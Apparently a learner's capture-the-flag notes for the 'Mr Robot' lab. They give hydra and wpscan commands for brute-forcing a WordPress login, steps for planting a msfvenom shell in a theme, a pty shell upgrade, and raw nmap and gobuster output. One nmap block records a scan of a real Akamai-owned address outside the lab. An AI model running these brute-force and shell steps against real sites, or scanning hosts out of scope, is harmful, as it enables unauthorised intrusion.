Mr Robot CTF

steps

1. nmap
2. gobuster gobuster dir -u <ip> -w <wordlist> -t 100
3. robots url
4. wpscan
5. burp suite login

hydra hydra -L <list of usernames> -p <test password> <ip> http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:Invalid username" -t 20

hydra hydra -l <username> -P <password file> <ip> http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:The password you" -t 20

8. or wpscan wpscan --url <ip> --U <username> -P <password list> -t 20
9. login
10. msfvenom shell
11. multi handler
12. edit theme and insert shell
13. upgrade shell python -c 'import pty;pty.spawn("/bin/bash")'
14. enumerate users home
15. crack
16. switch user

PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
MAC Address: 02:CD:BD:2D:91:E5 (Unknown)

208.185.115.6
PORT     STATE SERVICE      VERSION
80/tcp   open  http         AkamaiGHost (Akamai's HTTP Acceleration/Mirror service)
|_http-server-header: AkamaiGHost
|_http-title: Invalid URL
443/tcp  open  ssl/http     AkamaiGHost (Akamai's HTTP Acceleration/Mirror service)
|_http-server-header: AkamaiGHost
|_http-title: Invalid URL
| ssl-cert: Subject: commonName=a248.e.akamai.net/organizationName=Akamai Technologies, Inc./stateOrProvinceName=Massachusetts/countryName=US
| Subject Alternative Name: DNS:a248.e.akamai.net, DNS:*.akamaized.net, DNS:*.akamaized-staging.net, DNS:*.akamaihd.net, DNS:*.akamaihd-staging.net
| Not valid before: 2023-05-16T00:00:00
|_Not valid after:  2024-05-15T23:59:59
|_ssl-date: TLS randomness does not represent time
| tls-nextprotoneg: 
|   http/1.1
|_  http/1.0
8883/tcp open  secure-mqtt?
|_mqtt-subscribe: ERROR

===============================================================
/images (Status: 301)
/blog (Status: 301)
/sitemap (Status: 200)
/rss (Status: 301)
/login (Status: 302)
/0 (Status: 301)
/video (Status: 301)
/feed (Status: 301)
/image (Status: 301)
/atom (Status: 301)
/wp-content (Status: 301)
/admin (Status: 301)
/audio (Status: 301)
/intro (Status: 200)
/wp-login (Status: 200)
/css (Status: 301)
/rss2 (Status: 301)
/license (Status: 200)
/wp-includes (Status: 301)
/js (Status: 301)
/Image (Status: 301)
/rdf (Status: 301)
/page1 (Status: 301)
/readme (Status: 200)
/robots (Status: 200)
/dashboard (Status: 302)
/%20 (Status: 301)
/wp-admin (Status: 301)
/0000 (Status: 301)
/phpmyadmin (Status: 403)